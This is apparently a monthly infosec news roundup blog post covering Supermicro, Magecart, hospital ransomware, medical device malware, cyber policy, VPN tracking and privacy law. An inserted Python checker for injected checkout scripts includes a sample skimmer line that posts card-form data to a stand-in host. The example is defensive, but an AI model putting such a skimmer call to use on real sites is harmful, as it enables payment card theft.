[VIDEO] NewsJacker October: Bloomberg's Supermicro story, Infected Medical Devices, & CA Privacy Law


In this month's NewsJacker episode, Mike covers the InfoSec news you need to know in 7+ minutes.


Security Events

  • The Super Micro event happened
  • BEC is way up
  • DDoS using MikroTik routers seen last week
  • CA passes its own Net Neutrality law, regulates security of IoT, including a ban on default passwords
  • Finally, some attention on the water sector

First, this Super Micro business. Bloomberg journalists, known for maintaining high standards, seem to have screwed the pooch on this one. They claim that the Chinese have penetrated the supply chain of Super Micro computers and added a chip that effectively gives them full access. There’s a lot to unpack there: an implant like that would have to be aimed at specific targets to avoid detection, and everyone denies it (including the intel community), so Bloomberg has some ‘splainin to do. This isn’t over, but the denials combined with a lack of evidence suggest this didn’t happen… which raises the more interesting question: how was Bloomberg led to believe this?
Source: Decoding the Chinese Super Micro super spy-chip super-scandal: What do we know and who is telling the truth?


Finance

Yikes! USSS warns that ATMs are being wiretapped, so that a skimmer isn’t necessary. Look for weird faceplates on ATMs that may conceal holes that have been drilled to insert surveillance gear.
Source: Secret Service Warns of Surge in ATM Wiretapping Attacks

Further, and impacting a lot of retail, is the ongoing Magecart attack campaign. This works by breaching websites and injecting a malicious script that loads on payment pages, collects the card details users provide at checkout, and sends that info to a control server. Honestly, the real problem is application security and the failure to test applications against a reasonable standard like OWASP.
Source: Magecart Attacks Grow Rampant in September
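The defender's view of that mechanism, as an added example that is not from the original post: a small Python check that inventories the script tags on a checkout page and flags any external script, or any inline script that calls out to a host, outside an assumed allowlist of first-party and CDN hosts. The allowlist and the sample checkout HTML are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a checkout page is expected to load scripts from (assumed for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")  # absolute URLs in inline script bodies

class ScriptCollector(HTMLParser):
    """Collect the src of every external <script> and the body of every inline one."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []  # start capturing an inline script body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def find_suspicious_scripts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts that reach hosts outside the allowlist."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname  # None for relative (same-origin) paths
        if host and host not in allowed:
            findings.append(("external", src))
    for body in p.inline:
        for host in URL_RE.findall(body):
            if host not in allowed:
                findings.append(("inline-callout", host))
    return findings

# Constructed sample: a legitimate CDN script, an injected third-party loader, and an
# inline handler that posts to an unknown host when the card form is submitted.
SAMPLE_CHECKOUT_HTML = """<html><body><form id="payment"><input name="card"></form>
<script src="https://cdn.example/checkout.js"></script>
<script src="https://static.skimmer.example/jquery.min.js"></script>
<script>document.getElementById("payment").onsubmit = function () {
  fetch("https://collect.skimmer.example/c", {method: "POST"}); };</script>
</body></html>"""
```

Run the check against a fetched copy of the live checkout page on a schedule; a new finding is exactly the change a Magecart-style injection produces and is worth an alert.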


Healthcare

Lutheran Hospital in Ft. Wayne, Indiana had to cancel elective surgeries and divert ambulances to other facilities because of a “cyberattack”. OK, first of all when you have a ransomware outbreak, it’s not an “attack”. Someone tripped over the background noise of the Internet – it’s not personal. Still, the fact that hospital operations were disrupted that badly speaks to the ease with which the commoditized attack tools can cause collateral damage that far exceeds the annoyance of having to consider paying a ransom.
Source: Cyberattack forces Indiana hospital to cancel elective surgeries, divert ambulances

More to the point on trends, some surveys conducted by HIMSS have some interesting results that I think we should really be addressing: 20% of hospital executives say that malware has hit medical devices. That’s pretty disturbing...
Source: 1 in 5 health IT execs say malware has hit devices

And worse, they claim that 30% of those devices can’t be patched. We’re not there yet, but the time may be upon us that a trip to the ER to be connected to a life-saving piece of technology may be a roll of the dice in itself.
Source: Provider executives say one-third of their medical devices are unpatchable


Government and Military

Wow. OK, as a country the US has a new cyber strategy that is far less defensive and far more offensive. Is this a good thing? For deterrence it may be – countries are less likely to pull the trigger if they know retaliation is our policy (and the US is seriously good at this). However, that depends on attribution – knowing with a high degree of certainty what country is behind an action. Attribution is a black art, and there will always be claims of false flag and denials. Because of that, this policy has all the potential to result in outcomes that are the exact opposite of those intended.

Interestingly, Britain has actually practiced shutting down Russian infrastructure, and more importantly, made it known publicly that they’ve practiced. That in itself is deterrence.
Source: Britain has reportedly practiced a cyberattack to send Moscow into total blackout

The DOD is finding that many of our high-tech weapons – including nuclear weapons and nuclear warning systems – are insecure, and thus the threat of accidental nuclear war, or the inability to react in time to a nuclear event are now fun new things we can lump into the “cyber is going to kill us all” conversation.
Source: New Report Finds Nuclear Weapons and Related Systems Increasingly Vulnerable to Cyberattack, Analyzes Scenarios, and Offers Recommendations to Prevent Catastrophe

Litigation issues – California passed their own net neutrality law, and Vermont followed. The president says that these laws cause irreparable harm to the United States (setting aside that NN was the norm for a long time, and somehow, we didn’t fall over). Interestingly, it’s not the federal government suing these states, it’s the entire telecom industry. So, what does that tell you?

Also, it’s now clear that 99% of the unique-source comments to the FCC regarding net neutrality were in favor of it, and that nearly all of the comments urging repeal were from stolen usernames.
Source: Trump admin claims Calif. net neutrality law causes irreparable harm to US


Privacy and Surveillance

From the “you’re the product” department, almost every major free VPN service is tracking you, and selling your data. Yup, that privacy tool is doing exactly the opposite of the expectation created by using it. I honestly think that we could all get much better at reading terms of use before clicking that accept button.
Source: Almost Every Major Free VPN Service is a Glorified Data Farm

Amazon has patented technology for Alexa to diagnose you based on your tone of voice, coughing, sounding depressed, etc. to recommend meds for you to buy. On the face of it, this is a seriously bad idea and I don’t know how this made it through the Amazon PR-FAQ process. Clearly, there are no privacy implications of letting its voice assistant analyze the emotional and physical states of Amazon customers. None at all. My prediction is that this one doesn’t make it to market.
Source: Amazon patents Alexa tech to tell if you’re sick, depressed and sell you meds

California privacy act of 2018 will be enacted 1/1/20 unless lawsuits hold it up. This is all about giving consumers control over how their information will be used – including a requirement to allow consumers to opt-out of data being sold. Somewhat similar to GDPR, this trend is not going away. We’re all sick of being mined for data on our habits in order to sell us something, manipulate our opinions, or steal from us (basically the 3 things the Internet is good at).

Finally, a number of articles argue that spending on security is not moving the needle. They cite examples like Facebook’s troubles despite a significant allocation of resources, and there is some general consensus that continuing to spend on technology to solve security problems is not worth the money. Let me just say I agree.
Source: Exclusive: Tighter cyber security deemed not value for money
Source: Cyber-Attack automation gives hackers unprecedented advantage


In Conclusion

Spending on new tech that promises to solve your problems is not as effective as rolling up your sleeves, having appropriate preventive controls in place, and accepting that they will fail and being able to fall back on detection and response. What matters is how you limit the impact of what is now a foreseeable event: it’s going to happen. You’re secure until your ticket is punched, so you’d better be watching that network.

I'm Mike Hamilton, and this is NewsJacker.

Michael K Hamilton CISSP

The CISO